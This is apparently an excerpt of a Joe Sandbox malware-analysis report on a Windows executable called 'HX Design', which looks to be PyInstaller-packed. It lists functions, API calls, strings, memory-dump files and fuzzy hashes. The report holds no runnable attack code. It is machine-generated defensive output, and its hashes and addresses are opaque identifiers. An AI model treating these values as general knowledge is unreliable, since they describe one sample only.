ShutdownBlockReasonCreate.USER32 ref: 00007FF732068192
GetLastError.KERNEL32 ref: 00007FF73206819C
SetWindowLongPtrW.USER32 ref: 00007FF7320681B3

Strings

Needs to remove its temporary files., xrefs: 00007FF732068185

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 8db2052b94fb66c2b72206f813024814f6b29c41213e9b733babec58ceb836df
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 0C21EC21B09A4292E7416B79F894179A250FF88B90FD84230DE2D873E5DE6CD54CD324

Function 00007FF732076290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320762D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320766C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207695C

Strings

p, xrefs: 00007FF7320763FD
p, xrefs: 00007FF732076385
-, xrefs: 00007FF732076369
:, xrefs: 00007FF73207648C
f, xrefs: 00007FF7320763F5

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 0cd1ac7d8c32175691ddce0a0ce6c4ed9b91edcd19bf4850116295a5c3236c0a
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: BD127061E0C283A6FB647A1CD1542BEF6A1FB50750FC44135E69B46AC4DFBCE588EB20

Function 00007FF732070FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732071008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320713D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207166F

Strings

f, xrefs: 00007FF732071255
f, xrefs: 00007FF73207110A
f, xrefs: 00007FF7320710A0
p, xrefs: 00007FF7320710AD
p, xrefs: 00007FF732071112

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: ed78076f31f6aa2f294318ef55ec83903aa10f24e5db58e15f2d0d3763611756
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: B9129661E0C243A6FB247E18E054679F6A1FB80F54FD44035E69A47AC4DFBCE588EB60

Function 00007FF732061050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF732061098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7320610CC
fread, xrefs: 00007FF7320611FD
fseek, xrefs: 00007FF7320610D3
malloc, xrefs: 00007FF73206110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7320611F6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF732061108

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
Instruction ID: 214ca093491f94df52bd7333b87fe98486aa82ea463230b33745e3f7626d85cc
Opcode Fuzzy Hash: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
Instruction Fuzzy Hash: 1A41A221B08652A6EA10FB15E8046BAE391FF44FC4FC44432ED8C4B796DEBCE509E764

Function 00007FF732061470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF73206149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7320614DE
fread, xrefs: 00007FF7320615E6
fseek, xrefs: 00007FF7320614E5
malloc, xrefs: 00007FF73206151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7320615DF
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF732061518

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
Instruction ID: 03f748e23ab184c15441e64723ba966020395d3cb8ef41e5b78a5ffe30c64f04
Opcode Fuzzy Hash: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
Instruction Fuzzy Hash: 10418121B08643A6EB10FB21D4405BAE390FF44B94FC44532ED9D47B96DEBCE519E728

Function 00007FF73206EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF73206EA65

Part of subcall function 00007FF73206F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF73206F9FF
Part of subcall function 00007FF73206F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF73206FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF73206EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF73206ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF73206EE98

Strings

csm, xrefs: 00007FF73206EB60
csm, xrefs: 00007FF73206EA7F
csm, xrefs: 00007FF73206EAE6

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: 4fd0aca0971c72fa425bf99d301925014f6c8d49d116108ba1f4bead5319999a
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 44D1D332B08B429AEB20EF65D4407ADB7A0FB44788F900135EE4D57B96CF78E099D794

Function 00007FF732062C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
MessageBoxW.USER32 ref: 00007FF732062D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF732062D70
[PYI-%d:ERROR] , xrefs: 00007FF732062CA6
%ls: , xrefs: 00007FF732062D22
Error, xrefs: 00007FF732062D8C

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: 45ceae76b9c750aa1d07ccff3a12140a5f95895c8197e93fc1470a1ba7bb68be
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 2731D822708B4166E620BB25A8142BBA691FF88798F810136EF4D93759EF7CD54AD710

Function 00007FF73206DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD4D
GetLastError.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD85
FreeLibrary.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDFF

Strings

api-ms-, xrefs: 00007FF73206DD6D

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 0e0bd18d68acd259c9afd2594edc42d964b6ad71fa5ace60548169a8753dc1e1
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 3931D621B1A642A1EE11BB06A4006B5A3D4FF49BA4FD94535DD3E5B390DFBCE448D328

Function 00007FF732066360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

LoadLibrary, xrefs: 00007FF7320664AE
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF732066456
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF732066407
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7320663C7
ucrtbase.dll, xrefs: 00007FF7320663DD
Failed to load Python DLL '%ls'., xrefs: 00007FF7320664A7

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: 967bf6b8a112f732990a34582b8cf334438acd789e15bc2b29f74f267c1dd47d
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: B7416021B19A86B1EA25FB20E4542EEA361FF44344FC00132EA5D43699EFBCE51DD764

Function 00007FF732062A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF73206351A,?,00000000,00007FF732063F23), ref: 00007FF732062AA0

Strings

0, xrefs: 00007FF732062B16
Warning [ANSI Fallback], xrefs: 00007FF732062B0F
Warning, xrefs: 00007FF732062B1E
[PYI-%d:%s] , xrefs: 00007FF732062AA8
WARNING, xrefs: 00007FF732062AAF

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 6f41bccdc65c8b3659487b17931ac05f67b1741db81dcd0c9ea571957cf4e40e
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 5321A332719781A2E720AB55F8407E6A394FB88784F800132FE8C83759DFBCD149D750

Function 00007FF73207B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF73207B15F
FlsGetValue.KERNEL32 ref: 00007FF73207B174
FlsSetValue.KERNEL32 ref: 00007FF73207B195
FlsSetValue.KERNEL32 ref: 00007FF73207B1C2
FlsSetValue.KERNEL32 ref: 00007FF73207B1D3
FlsSetValue.KERNEL32 ref: 00007FF73207B1E4
SetLastError.KERNEL32 ref: 00007FF73207B1FF

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: be417e27483c94adb8c49ff48fcef4bc5467617b84a97c80b7a7359d73fb7d4d
Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: 8B219F30F0D242A1FA5873299A5513AD2425F447B0FD44734D93E47BD6DEACB849E760

Function 00007FF732087D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF732087D9D
GetLastError.KERNEL32 ref: 00007FF732087DA9
CloseHandle.KERNEL32 ref: 00007FF732087DC1
CreateFileW.KERNEL32 ref: 00007FF732087DEC
WriteConsoleW.KERNEL32 ref: 00007FF732087E0B

Strings

CONOUT$, xrefs: 00007FF732087DCD

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: a6552da9b8e83610aa44058c33b145efd1b1d8ab4fd2ce3cfe5d778f4bc21481
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 3F118431618A4196E750AB52E85432AE2A0FB88FE4F940234D96D877A4DFBCD818C750

Function 00007FF732068ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068F5A

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF73206906A

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction ID: b0f7528cda2152583152ab0b82cf054dacf1a85aacce76245cca4c27958c7200
Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction Fuzzy Hash: 5341D762B19686A5FA30BB11A5402BAF394FF84BC4F840135DF8D57B89DEBCE508D724

Function 00007FF73207B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B30D
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B33A
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B34B
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B35C
SetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B377

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 4e2f5dd7773db595235df4696eed858f3ba725a20cb7e844db9264bc19a4165d
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: DA11A230B0C642A2FA587329568513DD2429F447B0FD44735D83E877D6DEACB489E720

Function 00007FF732062910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E

Strings

Error [ANSI Fallback], xrefs: 00007FF7320629FF
Error, xrefs: 00007FF732062A0E
[PYI-%d:ERROR] , xrefs: 00007FF732062966
%s: %s, xrefs: 00007FF7320629E8

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 512a3ce63ac4637b42a212e25544e0c80f7409538e8813506ed7afeb1f60d510
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 88312622B1868166E720B765A8402F7E294FF887D4F800132FE8D83755EFBCD54AD620

Function 00007FF732062390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7320623C8
